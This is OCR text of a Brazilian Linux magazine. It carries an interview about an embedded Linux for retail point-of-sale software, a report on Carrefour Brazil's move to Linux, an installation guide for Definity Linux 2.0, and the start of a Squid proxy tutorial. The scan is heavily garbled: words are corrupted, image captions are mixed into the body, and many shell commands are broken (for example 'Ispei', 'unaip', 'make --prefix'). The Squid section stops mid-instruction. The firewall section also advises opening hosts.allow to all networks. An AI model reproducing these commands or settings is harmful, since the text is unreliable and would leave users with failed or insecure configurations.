novos cabos. PEM 
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Mais Um 


pró-Linux 


a parceria 


Zanthus e Topcomm se unem para desenvolver um novo 
sistema Linux para softwares de automação comercial 


necessidade das empresas 
em reduzir os custos de 
implantação dos sistemas de 
informática tem trazido cada 
vez mais benefícios para o Linux. 
Uma nova parceira em proi do 
pingúim acontece agora entre a 
Zanthus, empresa de automação 
comercial, e a Topcomm 
desenvolvedora de versões do Linux 

Essa é a primeira experiência da 
Zanthus com o sistema do pingúim. 
Segundo o diretor de tecnologia, 
Walace Soares, a expectaliva é que 
até 400 clientes adotem o Linux nos 
próximos anos e aposentem os 
sistemas DOS e Windows. A 
Topcomm entrou na parceria com a 
missão ds desenvolver uma versão 
mais enxuta, leve e específica para as 
necessidades da Zanthus. 

Confira agora mais detalhes desta 
iniciativa na entrevista exclusiva que 
Soares, da Zanthus, e Seido 
Nakanishi, diretor da Topcomm 
concederam à PE Master. Eles 
revelam seus planos, comentam o 
mundo Linux e até opinam no caso 
da SCO contra a IBM. 


PCM — Por que a Zanthus decidiu 
adotar O Linux para rodar seus 
softwares de automação comercial? 
Walace Soares - Vimos sentindo uma 
demanda grande do mercado em 
reduzir o custo, ter uma solução mais 
open source e mais adequada ao seu 
ambiente de negócios. Fol af que nós 
começamos a desenvolver nossas 
soluções para Linux e, junto com isso, 
surgiu uma necessidade muito grande 
de ter um Linux mais adequado às 
nossas soluções. 


PCM — A Zanthus é uma empresa que 
atua nessa área desde 1978. Por que 
só agora adotar o Linux? 

Soares — Na verdade, a Zanthus é 
uma empresa que vem, desde 1978, 
trabalhando muito com hardware, e a 
partir de três anos decidiu investir 
pesado em softwares e soluções. 
Existia uma solução antiga, que tem 
18 anos, que é o frente de loja, feito 
em DOS, Essa era a nossa solução 
mais velha, As nossas novas soluções 
vêm, logicamente, tendendo a ser 
preparadas para o Linux. Então, foi 
uma necessidade do mercado falar 
que precisava de uma solução 
rodando em Linux também. 


PEM — Um dos atrativos do Linux é q 
baixo custo, mas qual a previsão de 
economia para os usuários que 
adotarem o novo sistema? 

Suares — Não há uma estimativa, mas 
já vai partir da economia da própria 
compra do DOS e do Windows e de 
ter uma rede mais homogênea e 
estabilizada. Ainda não temos um 
número certo, se vai reduzir em 40%, 
50% ou 60%. 


PCM — Como funciona o sistema atual? 
Soares — Temos uma parte em 
Windows e outra em DOS. A solução 
mais antiga é toda em DOS e as 
novas são feitas em Windows. 


PEM — O Linux é um software livre, Por 
que a parceria com a Topcomm, e não 
desenvolver sua própria distribuição? 
Soares - Na verdade, a Topcomm está 


fazendo a aistriouição. Ela está 
custemizando um Linux espec almente 
para as nossas necessidades: 
compatibilidade com harewares mais 
tigos, com menos memória e 
processador menos poteme, e com 
um novo tipo de hardware que 
estames lançando, que usa discochip. 
jão vamos ter HD) nessas mácuinas 
por serem menores. No: 
necessitade era não pegar um Linux 
muito pesado como uma eistribuição 
Red Hat ou Conectiva, que precisa 
carregar multa coisa 2 consome 
cemais memória RAM e HD. 


an 


PCM - Como está senco o 
desenvolvimento deste Linux por 
parte da To m? 

Selo Nakanishl - Nossa empresa 
é especializada em aplicações 
embedded, e um dos requisitos 
é Deupar menos espaço e usar 
menos recursos do equipamento 
Porianto, existe a exigência de 
um Linux especializado. Para se 
ter uma idéia, um Red Hat ou 
Conectiva com uma instalação 
vazia val ocupar cerca de 180 
Mb de HD. A nossa solução 
completa, com todas as 
aplicações e tudo o que o Zeus 
precisa, ocupa menos de 84 Mb 


PEM — O TopLinux criado pela 
Topcomm também é livre? 
Nakanishi — Os componentes são 
livras, como o Kernel, as 
bibliotecas e os utilitários. O que 
nós temos customizado para a 
Zanlhus são scripts de 
Inicialização e códigos de 
proteção de cópias. Esses são 
propriesários. A resposta, então, é sim 
e não. E código aberto, mas a 
distribuição em si não é aberta, Se 
alguém solicitar parte do código para 
a Zanthus, acredito que ela vai honrar 
conforme as normas do GPL. 

Saares - Não há a intenção da 
Zanthus em cobrar por esse Linux de 
nossos clientes. Ele vai junto com 
nosso produto para funcionar e 
reduzir o custo de propriedade. 


a 


Soares: economia com o 


POM - Que outras aplicações e 
empresas utilizam o TopLinux? 
Nakanishi — Temos TopLinux rodando 
em 300 centrais da Telemar, em 
vários pedágios e terminais de 
consulta ce 


PCM - Em gue linguagem o programa 
da Zanlhus foi desenvolvico? 

Soares — Esse que a gente está 
portando agora iol feito em C Os 
outros são feitos em Detohi e Calix 
Ous já são portáveis para Linux 
sem grandes complicações 


PCM — A SCO entrou com uma ação 
contra a IBM com a alegação ce uso 
indevido de patentes de alguns 
códigos do Linux. Como a Topcomm 
analisa essa briga? 

Nakanishi - A SCO é uma empresa 
que está em falência e só não taliu 
provavelmente porque a Microsoft 
comprou uma parte deles. 
Recememente, a Microsoft fez uma 
injeção de capital exatamente para 
sustentar essa difamação em relação 


Linux pode chegar a 60% 


ao Linux e criar um medo no mercado. 
É propositadamente isso. 

Provavelmente, o objetivo é manter em 
suspense essa questão. O resuliado 
final, não tenha nenhuma dúvida qua 
será. O pleito da SCO não tem 
nenhum fundamento, ou. se tem, não 
é sólido para justificar de uma hora 
para outra a SCO licenciar o Linux, O 
que a SCO levou a público como 
sendo prova é absolutamente ridiculo, 


PEM- O sr acredita que a Microsofr 
está usando a SCO para fazer 
pressão contra os usuários do 
sistema open source? 

Nakanishi — A Microsoft faz o que 
está no direito dela, Não vejo 
isso como certo ou errado. 
Talvez se eu estivesse no lugar 
dela faria a mesma coisa 


PCM — A Zanthus e a Topcomm 
temem que essa briga gere 
receio nos usuários? 

Soares — Não, Pelo menos com 
os usuários com que temos 
conversado não há nenhum 
receio quanto a isso, Como é 
uma solução muito específica e 
direta, não temos problema com 
essa briga da SCO com a 
comunidade livre. 


PCM — A meta de vocês é ter 
quantos clientes usando Linux? 
Soares — Sentimos que os 
clientes médios e grandes 
querem muito ir para essa 
solução, Estimamos entre 10% e 
20% da nossa base, Ou seja, 
falamos em torno de 300 a 400 
clientes em um processo de três a 
quatro anos, porque existe um 
problema de cultura. A cultura 
Microsoft e Windows é muito forte e 
temos de vencê-la 


PCM — Essa ação da SCO não pode 
reforçar ainda mais essa cultura? 
Soares — Reforça sim, mas quando 
você fala em redução de custo de 
propriedade, isso é um diferencial 
muito grande, PCM 
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sistema cos 7,7 mil PDVs 

(Pontos de Vendas) da rede 

Carrefour estava cada dia mais 

obsoleto quando o CIO (Chief 
Information Officer) do grupo francês 
no Brasil, Marcelo Góes, iniciou um 
trabalho para sua alualização. Já nos 
primeiros estudos ficou claro que 
adotar o sistema Linux seria a melhor 
opção. Essa proposta veio diretamente 
da Unisys, contratada pelo grupo para 
fazer a migração de todo o sistema. 
Góes afirma que a principal 
preocupação não era a de reduzir 
custos, mas admite que a medida 
trouxe uma economia para a 
empresa. "Para nós. não houve uma 
redução acentuada, mas viabilizou o 
projeto. Se tivéssemos de comprar as 
licenças, nossos custos seriam bem 
maiores', diz ele. 

Por enquanto, a maior parte das 
unidades Carrefour ainda não fez a 
mudança para 0 Linux, Essas lojas 
continuam operando o sistema DOS 
nos terminais dos PDVs. Já os Pontos 
de Vendas são ligados a um servidor 
SCO. 'Esse sistema estava esgotado e 
a própria plataforma colocava 
imitações para alguns trabalhos de 
negócios e suporte", explica o CIO 
Com a mudança já efetuada em quatro 
unidades do grupo, sendo três lojas do 
hipermercado Carrefour e uma do 
supermercado Champion, tanto os 


Rede Carrefour adota o sistema do pingúim para modemizar 
as frentes de caixa de 82 hipermercados do grupo no Brasil 


PDVs como os servidores de rede já 
operam totalmente em Linux Red Hat. 
Para Góes, a principal vantagem 
conquistada após a implementação 
do Linux nos PDVs das lojas 
Carrefour foi a robustez e a 
compatibilidade com os diversos 
periféricos das frentes de caixa, como 
Impressora, taclado, leitor de cheque e 
scanner dos códigos de barra. "O 


Linux conseguiu rapidamente se 
imegrar', afirma. Outro ponto apontado 
pelo CIO da rede é a funcionalidade 
do suporte conquistado com o 

novo sistema. "Agora, temos um 
suporte centralizado que antes era 
difícil de fazer com o DOS, além da 
questão de compatibilização 
independente do hardware que é 
utilizado", completou Góes. 


Entenda o sistema 

Para fazer a atualização de seus aconteceu am três lojas do 
7,7 mil POVs,O Carretour contratou a hipermercado Carrefour e uma do: 
Unisys. Todo o sistema, no entanto, fol Supermercado Champion. Ao todo, 250 
desenvolvido pela empresa alemã PDVs já estão na era do pingúlm. 
Wincor Nixdor!, parceira da Unisys. As lojas que ainda não adotaram 


desde 1993: A rede de hiparmercados 
adotou o software Calypso, faito em, 
linguagem C & utilizado por outras 40 
empresas no Brasil. 

Tanto os PDVs como-o servidor da 
rede utilizam à versão 7.1 do Hed Hat, 
A questão de tarianho do sistema 
operacional não chega a ser um 
problema nem mesmo para os POVs, 
que foram desenvolvidos para possuir 
uma arquitetura de PC 

Os equipamentos das frentes de 
caixa trabalham com memória ds 32 
ME RAM, placa de video e placa de: 
réde Já o servidor atua com uma 
memória de 256 MB de RAM: A 
migração para à sistema Linux já 
(o 


O Linux permanecem trabalhando com. 
os PDVs em DOS e 08 servidores SCO. 
À gerente de projetos da Unisys, 
Cristina Pimentel, explica que essa 
mugança será feita de forma gradual, 
à medida que os hardwares forem, 
substituldos, sam a necessidade de 
paralisação dos trabalhos da joja. 
“Trabalhamos no período em que a loja 
estiver gerada” 

Cristina explicou que um dos. 
principais atrativos para a escalha do 
Linux para desenvolver o soltware 
Calypso foio baixo custo do sistema. 
“Foi um direcionamento da Wincor 
Nixdlorl, mas uma das vantagens 
Obvias era a questão da licença. 


A mudança 

A migração para o sistema do 
pingúim começou a ser testada 
pela rece no ano passado, mas 
sua aplicação teve in apenas a 
partir de 2003. A primeira loja a 
entrar na era do Linux fai a unidade 
do supermercado Champion de 
Piracicaba. Com o sucesso do 
Linux, o Carrefour Anchieta, em 
São Paulo, também entrou na era 
de pingúim. O sistema estav: 
então, consolidado & pronto para 
ingressar de vez em todas as lojas 
ca rede. À partir daí, ficou 
ceterminado que todas as 
unidades que fossem inauguradas 
já começariam o trabalho com o 
Linux. E foi isso o que aconteceu 
nas lojas Cambuci-Lion e Villa 
Lobos, ambas em São Paulo. 

Os planos para q pingúim 
dentro do Carrefour estão maiores 
e sua adoção será feita de forma 
gradual, A rede planeja 
implementar o Linux até o final de 
2005 em 80% de todos os 7,7 mi 
PDVs espalhados por 82 


ms 
Facilidade na operação do sistema Linux ainda permite economia para a rede no treinamento dos funcionários 


hipermercados e 112 
supermercados de 11 Estados 
brasileiros. Para isso, todas as 
novas unidades serão instaladas 
com o sistema do pingúim. Já a 
substituição das atuais lojas que 
ainda operam baseadas com PDVs 
em DOS e servidores SCO será feita 
à medida que os hardwares forem 
trocados, uma forma de evitar a 
paralisação das unidades, já que a 
troca pode ser realizada durante O 
periodo de ociosidade das lojas. 
Nas unidades em que essa 
mudança já ocorreu, o CIO garante 
que não houve qualquer problema 
de adaptação dos funcionários que 
passaram a trabalhar em cima do 
sistema Linux. A facilidade de 
adaptação proporcionada pela 
interface gráfica, inexistente no 
sistema antigo, poderá gerar um 
outro ganho. "O sistema simplifica a 
operação e ainda permite que se 
diminua o esforço de Ireinamento. 
Um ponto importante, já que grande 
parte dos nossos funcionários 
trabalha na frente de caixa”, avalia 


Invasão Linux 

Se para as frentes de caixa o 
3 do Linux é irreversível, a 
a tendência pode ser 
verificada para outros setores da 
rece. Góes explica que novos 
estudos já estão sendo feitos para 
adotar o sistema do pinguim em 
redes dedicadas, como servidores 
de impressão e de rede. E nesse 
caso, e principal atrativo Linux é. de 
fato, o baixo custo. 

Já novos avanços nos PDVs 
ainda poderão ser verificados no 
futuro, com a atualização mais 
simples do sistema. "Temos uma 
estrada aberta para evoluir e não 
temos mais uma limitação 
tecnológica”, explica Gões. Essa 
possibilidade de aperteiçaamento é o 
que realmente agrada ao CIO do 
Carrefour, já que avalia que por 
enquanto não houve ganhos 
significativos na agilidade do 
trabalho. “A performance é 
semelhante, mas a grande vantagem 
é na questão tecnológica a médio 
prazo", completa o CIO. PCM 
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A qo o 


Facilidade de instalação e 


[=] 
operação são as 
vantagens deste Linux 
brasileiro que usa como 
base 0 famoso Slackware [] 
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Definity Linux é uma das mais 
importantes distribuições 
brasileiras. Bascacdo no 
Slackware Linux, que hoje 
está na versão 9.1, o Definity traz o 
que há de mais forte no consagrado 
lackware. Para quem não conhece. 
o Slack é considerado a distribuição 
Linux mais estável e segura do 
mundo. O Definity segue essa mesma 
base, mantendo as qualidades desse 
incrível sistema 
A grande diferença do Definity 
para o Slackware são os arquivos 
que estão pré-configurados com os 


padrões mais usados no Brasil, e 

já ser traduzido para o português 
Mesmo sendo baseado no 
Slackware, o sistema foi otimizado 
para facilitar a instalação para quem 


nunca utilizou o Linux. Entre os 
programas que acompanham es 
sistema, podemos citar os utilitários 
que laciltam na hora de contigurar 
os dispositivos. 

Nessa edição, você encontra o 
Definity 2.0 em dois CDs. 
Acompanhe os passos e veja como 
instalar e configurar o sistema em 
seu computador. 


nicializaçã 
N 


recurso de inioi 
será necessária a criação de um 
coloque 
Josutils 
Nesse diretório, você encontra O 
programa que gera o disco de by 
Copie o arquivo rawnite para um 
computador Agora, copie 
á dentro do diretório 
bootdisks para o mesmo | do 
arquivo rawiite. Ar de prosseguir, 
coloque um disquete vazio no drive. 
Para criar o disco de boot, execute O 
programa rawrite e n a de 
comando source, digite 


pot 


sbootmgradsk 


Na infornação do destino digite: 


Em seguida, coloque o 
disquete de buot e o CD 1 no 
computador é inicie normalmente. Na 
tela de escolha do dispositivo de 
o. Indigt -ROM 
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Para iniciar o processo de 

instalação, ative a opção de 
suporte à inicialização do sistema a 
partir do CD-ROM. Para saber onde 
fica localizada essa opção no setup 
da placa-mãe, consulte o manual do 
fabricante, Inicie agora o computador 
com o CD1 de Definity Linux 2.0 
dentro do drive e aguarde a teia de 
instalação aparecer, Pressione a tecla 
Enter para prosseguir. 


A próxima tela é referente ao 

mocelo de teclado que o sistema 
utilizará. No Brasil, o modelo mais 
comum é o brabnt2. Selecione o 
teclado com as setas direcionais e 
pressione Enter. 


Em Selecione o tipo de mouse, 
escolha o modelo que está 
conectado ao seu computador. 


Configuração 
Mínima 


* Processador 200 MHz 
* Placa de video SVGA 
* Memória RAM 32 MB 
* Espaço em disco. 21 GB 


Recomendada 

* Processador B00MHz 
» Placa de vídeo SVGA 
* Memória 128 MB 

* Espaço em disco 10 GB 


Interface gráfica padrão do sistema é muito fácil de usar 


NE 


Para configurar o relógio 
corretamente, na tela de Fuso 
Horário selecione a região correta 


Se você tem instalado um modem 

do tipo hardmodem, escolha em 
qual porta ele está conectado. Essa 
configuração não funciona para 
softmodem. 


Na tela de seleção da resolução 

do terminal, selecione a opção 
Normal, Para alterar a resolução do 
terminal, é necessário que sua placa 
de vídeo possua suporte à tecnologia 
Frame Butter. 


Como o Linux é multiusuário, é 

preciso colocar uma senha para o 
usuário root (administrador do 
sisterna), para que outros usuários 
não tenham acesso a ele. Na janela 
Senha, adicione uma senha com mais 
de quatro caracteres e, no próximo 
campo, confirme digitando-a 
novamente. Note que ao digitar a 
senha, o campo ficará em branco. 


Adicione um nome ao 
computador colocando no campo 
Host o nome que você desejar 


A etapa de criação das partições 

do sistema é uma das mais 
importantes. Nela, você adiciona a 
partição em que o sistema será 
instalado. O processo de criação é 
feito totalmente em modo texto. Para 


Es. À 


Definity traz a PRGREVO para desenvolvimento de sofiwara 


criar a partição, é necessário que 
haja uma outra livre ou que possa 
ser removida 

Para uma nova partição, selecione 
o HD com as setas direcionais e 
pressione a tecla Enter. Uma tela com 
fundo preto deve surgir. Com as teclas 
direcionais, escolha a partição. Nos 
botões que estão no rodapé, deve 
aparecer o nome Nova. Selecione essa 
opção e pressione Enter. No local em 
que você deseja criar a partição, 
escolha Primária. 

Em tamanho da partição, remova 
do total que está marcado 128 MB 
Esse espaço é para a criação da 
partição SWAP. Com isso, uma 
partição que está mostrando 7.000 MB 
deve ficar com 6.872 MB. Para 
confirmar a alteração, pressione Enter 
e, em seguida, Fim. 

Com a partição do sistema criada, 
será necessário adicionar a partição 
de troca chamada SWAP. Selecione 
na lista a partição livre e, em seguida, 
Nova. No tipo de partição, coloque 
Primária, Mantenha o tamanho total da 
partição e, para concluir, pressione 
Enter. Note que a partição criada 
ainda não está com a propriedade 
SWAP. Para torna-lá ativa, escolha a 
opção TIPO e pressione Enter até 
voltar à tela das partições. 

As alterações feitas nas partições 
ainda não foram salvas. Para isso, 
escolha Gravar e, na pergunta sobre a 
configuração, digite Sir. Para sair do 
programa, selecione Sair, 


1 Note que 0 programa de 
instalação voltará a mostrar a 
lista de partições. Na lista. escolha a 
partição com o maior tamanho criado 
no processo anterior e aplique a 
opção Alterar. Selecione Ponto de 
Montagem e adicione /. Volte ao 
menu principal e vá em Avançar. 


1 Já com as partições criadas, 

será preciso escolher o tipo 
de instalação que será feita. Para 
instalar todos os pacotes, selecione 
a opção ALL 


1 Para iniciar a cópia dos 
arquivos, escolha Avançar na 
lista de pacotes. 


13 Ao concluir a cópia dos arquivos, 
uma janeia deve aparecer, 
Escolha nela o Keme! que seu sistema 
utilizará para poder iniciar. 


1 Para ativar o gerenciador 

de inicialização do sistema 
(nesse caso, o LILO), indique na 
opção o local MBR 


1 Após configurar o UILO, o 

sistema tentará encontrar o driver 
correto para a sua placa de vídeo. 
Quando a tela voltar, escolha a 
profundidade de cores para O 
aplicativo Xíree, normalmente 16 bits 
(65.536 cores) 


1 Com as opções de vídeo 

configuradas, aplique a 
resolução compatível com a sua 
placa de vídeo e monitor. E 
aconselhável manter a resolução que 
estiver selecionada. 


1 Se deseja saber quais opções o 
sistema detectou, escolha Sim 


1 Para carregar automaticamente a 
interface gráfica na Inicialização, 

escolha Sim. Caso contrário. será 

preciso carregá-la manualmente. 


1 Pronto, seu sistema está 

instalado e pronto para iniciar, 
Para reiniciar, remova o CD e escolha 
OK na mensagem de finalização 


OpenOffice conta com suporte de idioma para a língua portuguesa, versão Brasil 


Arquivo fvojóto Ferramentas Configurações Ajuda 
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TEELITENIE O Crime cn fr EEE 
Distribuição já vem com o mais famoso programa de gravação de CD, o K3b 


PomMaster 27 


E Shell” Ramsolo 


PRINCIPAL 


Configuração 

Como você notou na instalação. 
em nenhum passo foi solicitada a 
criação de um o de emergência. 
Ele tem a função de acessar o 
sistema caso ocorra algum problema 
no gerenciador de boot. Se ao iniciar 
o computador pela primeira vez o 
sistema não carregar, coloque o CD 1 
no drive e aguarde o carregamento. 
Ao concluir, execute o seguinte 
comando logo após o campo boot 


boot: ide.i root=/dev/hda1 noinitrd ro 


Altere /dev/hda? pelo dispositivo 
que está instalado no sistema. 


As opçi m ser alteradas 
comu programa. 
Acesse-o digitando no terminal o 
seguin! nando 
* setup 

Existem as seguintes categorias 


* Configuração do Console: altera as 
configurações de fuso horário, 
mouse, teclado e tipo de fonte. 


* Configuração do Sistema Gráfico: so 
ocorrer algum problema na 


tema gráfico ou 
se quiser alterar as configurações 
de vídeo, utilize essa opção. 


Configuração dos Serviços 
(standalone); utilizado para adicionar 
ou remover Os serviços que iniciam 
junto com o sistema. 


Configuração dos Serviços (xinetd): 
habilita programas que precisam de 
portas exclusivas 


Configuração da Rede: altera ou 
adiciona interfaces de rede. 


Configuração da Impressora: adiciona 
uma impressora ao sistema 
Suporta conexão via porta paralela 
serial ou impressoras remotas 
(através da rede) 


Instalação de Pacotes do CD: adiciona 
os programas contidos no CD2 


As instruções de utilização são 
detalhadas e de fácil configuração, 
mesmo sendo em modo texto. 

Ao acessar O sistema, o ambiente 
gráfico deve ser carregado 
automaticamente. Se isso não 
acontecer, será preciso recontigurar 
a parte gráfica novamente. Para 
isso, pressione as teclas CTRL+F6 
e conecle-se ao sistema como 
superusuário (colocando em Nome do 
usuário root e em Password a senha 
que cadastrou na instalação - passo 7). 
Digite agora no terminal o utilitário de 
configuração Setup. Em seguida, 
acesse a opção Configuração do 
Sistema Gráfico. Basta seguir os passos 
na tela e, ao concluir a configuração, 
reiniciar o computador com o comando: 


* reboot 


Se não iniciar novamente, diminua 
a qualidade de vídeo e resolução até 
encontrar a configuração ideal 

Como o Definity Linux é baseado 
no Slackware, alguns processos 
de configuração ainda são feitos 
manualmente. Um deles é para 
configurar a placa de som. O sistema 
possui um arquivo que habilita os 


msi = 


O Definity traz várias alternativas para programas Windows 


módulos na inicialização do sistema 
Abra o arquivo de configuração com 
o seguinte comando: 


* mcedit /etc/re.d/re.modules 


Esse arquivo é um pouco 
extenso, mas está ordenado por 
categorias. Para habilitar uma placa 
de som, por exemplo, acesse a 
categoria Sounds Supports, que 
está na linha 210, e localize o módulo 
referente à sua placa. Note que 
existem duas linhas de comando 
para cada modelo de placa. Uma 
dessas linhas é só comentário e 
não pode ser habilitada. No 
exemplo a seguir, você encontra 
duas linhas de comando. A primeira 
é 0 comentário e a segunda a linha 


O Gnome é uma das opções de interface que estão no Linux 


Eanes 2000 


de comando a ser ativada 


* Sound Blaster Live support: 
*/sbin/modprobe emulOk1 


A linha de comando deverá ficar 
da seguinte maneira 


/sbin/modprobe emutOkt 


Salve o arquivo e ative as novas 
alterações com o comando: 


& /etc/re.d/re.modules restart 


Para saber o módulo que precisa 
ser carregado para determinadas 
placas, o sistema conta com um 
utilitário que mostra seus modelos. 
Para isso, digite o comando: 


Interface similar à da Microsoft é ideal para iniciantes Linux 


* Ispei 


Verifique se o módulo foi 
carregado com sucesso, digitando: 


* Ismod 


No exemplo anterior, deve 
aparecer o módulo emu10k1 na 
lista de módulos carregados 


Instalando Programas 

O CD número 2 que 
acompanha esta edição 
possui uma série de programas 
a serem instalados. Para isso, 
será preciso antes montar o CD 
com o comando: 


* mount /mnt/edrom 
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Acesse o utilitário Setup: 
* setup 


Escolha no menu Setup a opção 
Instalação de pacotes do CD. Os 
programas que já estão instalados 
não serão mostrados na lista. 

Para instalar um programa que 
está no formato rpm, será preciso 
antes convertê-lo para o formato do 
sistema, o apak. No mesmo local do 
arquivo rpm, execute o comando: 


% dpak -R nomepacote.rpm 


Com isso, será gerado 
um arquivo com a extensão 
dlpak. Instale-o executando 
o seguinte comando: 


* dpak -i nomapacote.dpak 


Por ser baseado no Slackware, 
os arquivos do tipo tgz também 
podem ser instalados. Basta 
executar o comando: 


* dpak -S nomepacote.tgz 


Após converter o arquivo para tgz, 
instale-o executando o mesmo 
processo do arquivo som. 

Na instalação-padrão, somente o 
gerenciador de janelas KDE está 
instalado. Para instalar um novo 
gerenciador, como o Gnome, por 
exemplo, execute o comando: 


Desinstalar programas no sistema é muito fácil 


* dpak 
/mnt/cdrom/extra/gnome/* 


Com isso, todos os pacotes 
Gnome serão instalados. Você pode 
fazer o mesmo processo de 
instalação pelo utilitário Setup. O 
sistema possui diversos 
gerenciadores de janelas, que você 
encontra no diretório 
Imnijedrom/extralxap. 


Instalando o OpenOffice 

A instalação do OpenOffice no 
sistema requer um pouco de 
atenção. Isso porque ele não vem 
junto com o sistema e precisa ser 
instalado à parte. 


Inicie a instalação executando o 
seguinte comando 


* dpak -i /mnt/cdrom/extra 
/xap/openoffice-1.0.3-1386-1.dpak 


Com os arquivos necessários 

instalados, será preciso ativá-los 
para o usuário a que você está logado 
no momento. Para isso, entre no modo 
gráfico do sistema. Abra o console e 
execute o comando: 


* /opt/OpenOffice/setup 


Ao digitar o comando, uma tela 
de configuração aparecerá. Clique 
no botão Avançar até a tela de 
escolha do tipo de instalação. Como 


os arquivos de instalação já se 
encontram no computador, escolha 
Instalação Estação de Trabalho e 
prossiga até concluir. 

Para acessar o programa, clique 
no menu K e, na lista suspensa, 
selecione OpenOffice. 


O OpenOffice, mesmo sendo em 

português, não vem com corretor 
ortográfico, que precisa ser instalado. 
Faça o download do dicionário no link 
hitp://www.ime.usp.br/--ueda/br.ispell/ 
pt BR.zip e, em seguida, no mesmo 
local do arquivo, execute: 


* unaip pt BR.zip 


Agora, copie os arquivos para O 
diretório correspondente no 
OpenOffice usando os comandos: 


* cp pt BR.aff /opt/OpenOffice/ 
share/dict/o00/ 


* cp pt BRdic /opt/OpenOffice/ 
share/dict/000/ 


Com um editor de texto, abra o 

arquivo dictionan.!st, que está no 
diretório /opt/OpenOffice/share/ 
dic/ooo/dictionar.Ist, e adicione a 
seguinte linha de comando: 


DICT pt BR pt BR 
Abra agora o OpenOffice e, dentro 


do programa, localize o menu 
Ferramentas. No menu suspenso, clique 


|. Asquivo Editar Exibir ir Marcadores Ferramentas .Janeta Ajuga 


og 


O sistema já traz todos os recursos e programas para funcionar na Internet 


em Opções. Na janela de 
configuração, expanda a lista 
Coniigurações da Língua e clique em 
idiomas, Em Idioma padrão para 
documentos, no campo Ocidental, 
escolha Português (Brasil). Agora, na 
subseção lingúlstica, clique no botão 
Editar. Selecione no campo Idioma a 
opção Português (Brasil) e marque o 
campo Spelling: OpenOffice MySpell 
SpellChecker. Clique no botão Fechar 
e, em seguida, OK. Feche o 
programa e abra novamente para 
configurar as alterações. 


Sistema fechado 

Diferente das outras 
distribuições, o Definity vem com 
firewall pré-configurado. Ao utilizar o 
sistema em uma rede de 
computadores, será preciso habilitar 
algumas regras. Para alterar essas 
configurações, será necessário editar 
os seguintes arquivos: 


Hosts.allow — responsável em liberar 
o acesso a outras redes 


Iptables.conf — indica qual porta os 
computadores externos poderão 
acessar. Ideal para restringir o acesso 
a serviços que você mantém 


funcionando somente na rede local 

O primeiro arquivo que precisa ser 
configurado é o hosts.allow. Com um 
editor de texto, abra o arquivo que 
está localizado em /etc/hosts.allow. 
Você encontra o seguinte comando 
que precisa ser alterado: 


ALL; 127. 


Essa linha de comando bloqueia 
todos os computadores, menos os 
que possuem a rede que começam 
com o IP 127. Altere o valor 127. pelo 
endereço da sua rede. Para habilitar 
acesso a todas as redes, coloque no 
lugar do endereço a informação ALL 
Com isso, o comando deve ficar da 
seguinte maneira: 


ALL; ALL 


Em seguida, será preciso 
configurar o arquivo iptables.conf 
para que os computadores consigam 
acessar determinadas portas do 
sistema. Como padrão, somente as 
porta 22 (ssh), 5000 até 5100 (icq) e 
6346 (gnutella) estão habilitadas 

As regras de firewall precisam ser 
criadas manualmente, tanto para a 
rede interna (local) quanto para a 


rede externa (Internet). No arquivo, 
você encontra a seguinte informação 
a ser modificada 


OUTTCP= 


Nessa linha de comando, você 
especifica a porta que os usuários da 
rede externa podem acessar. Já para 
a rede intema, especifique as portas 
na linha de comando: 


INTTCP= 


Se desejar adicionar mais de uma 
porta, basta separá-las por vírgula. 

O Definity Linux pode ser adotado 
por qualquer usuário que deseja 
usá-lo como sistema operacional 
workstation. Devido à sua forma de 
configuração prática, com apenas 
alguns comandos, todo o sistema 
estará pronto para uso com pouco 
esforço. Além disso, sua interface 
permite uma fácil adaptação por 
qualquer tipo de usuário, inclusive 
aqueles que ainda não têm muita 
familiaridade com o sistema Linux. 

Para completar, por ser baseado 
no Slackware, O Definity também é 
uma boa opção para usuários 
avançados no pingúim. PEM 
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Aprenda a turbinar 

o compartilhamento 
de acesso à Internet 
com o servidor proxy 
Squid do Linux 


acesso banda larga na 
maioria das empresas 
brasileiras já é uma 
realidade. No entanto, o 
compartilhamento do acesso para o 
restante da rede ainda apresenta 
dificuldades. Para solucionar o 
problema, tem se propagado a 
utilização dos servidores proxy/cache 
A grande vantagem do sistema é 
que apenas uma máquina faz o 
download das páginas. Com isso, 
quando dois ou mais usuários 
acessam o mesmo site, apenas o 
servidor busca as informações. 
Nessas características, o Squid 
desponta como uma das principais 
ferramentas e tem se tornado ainda 
mais popular pela facilidade de 
administração e compatibilidade com 
os diversos sistemas operacionais, 
entre eles o Linux e o Windows 
Outra grande vantagem é o 
controle de acesso. De maneira 
simples, pode-se proibir a 
visualização de determinados sites 
ou liberá-los apenas em horários 
predefinidos. A seguir, veja como 
instalar o Squid no sistema Linux 


Preparando o sistema 

Antes de iniciar a instalação, será 
necessário criar o grupo e o usuário 
que poderá utilizar os recursos no 
sistema e manter sua segurança 


Primeiro, será preciso criar um 


grupo. Execute o comando a seguir: 


* groupadd -g 201 squid 


Adicione agora o usuário, com 
o seguinte comando 


* useradd -d /cache/ -s /dev/null -g 
squid Squid 


O comando para adicionar um 
usuário indica que o 


diretório-padrão do Squid é cache. 
Crie este diretório executando: 


* mkdir /cache 


Altere a permissão de escrita dos 
diretórios para o usuário Squid! 


* chown -R squid.squid /cache 
* chmod 750 /cache 
* chmod 750 /logs 


Instalação e configuração 
Faça o download da versão 
estável do Squid no endereço 

http:/Mww.squid-cache.org/. 


Com o arquivo no computador, 
descompacte-o executando o 
comando no mesmo local do arquivo: 


* tar -zxvpf squid-2.500.tar.gz 


Acesse o diretório que foi criado 
com os comandos a seguir 


% make --prefix= /usr/local 

* make install 

* strip /usr/local/sbin/squid 

* strip /usr/local/bin/squidclient 


Acesse o diretório para encontrar 
o arquivo de configuração: 


* cd /usr/local/etc 


Com o Squid você pode restringir o 
| acesso de diversas maneiras. Para 
bloquear alguns sites, adicione o 
seguinte acl no arquivo de configuração: 


acl proibido url regex 
*/usr/local/etc/proibido! 


Agora, crie um arquivo no diretório 
Jusrflocalfetc/ com o nome de proibido 
e adicione todos os sites que você 
desejar, sempre um embaixo do outro. 
Além de endereços, o programa 
suporta a inclusão de palavras-chave. 

Novamente no arquivo de 
configuração do Squid, adicione a 


seguinte linha de comando antes do 
http access allow usercomum 


http access deny proibido 


Você também pode bloquear o 
acesso apenas em determinados 
horários. Para habilitar o acesso 
somente na hora de almoço, por 
exemplo, coloque as seguintes linhas 
de comando no arquivo de 
configuração do Squid: 


acl almoco time MTWHF 12:00-13:30 
http access allow usercomum almoco 
http access deny usercomum 


Como existem muitas linhas de 
comando, vamos criar um novo arquivo 
somente com as mais importantes. 


Renomeie o arquivo com o 
seguinte comando 


% mv squid.conf squid.conf. bkp 


Com um editor de texto, crie um 
arquivo com o nome squid.conf e 
adicione as seguintes linhas 


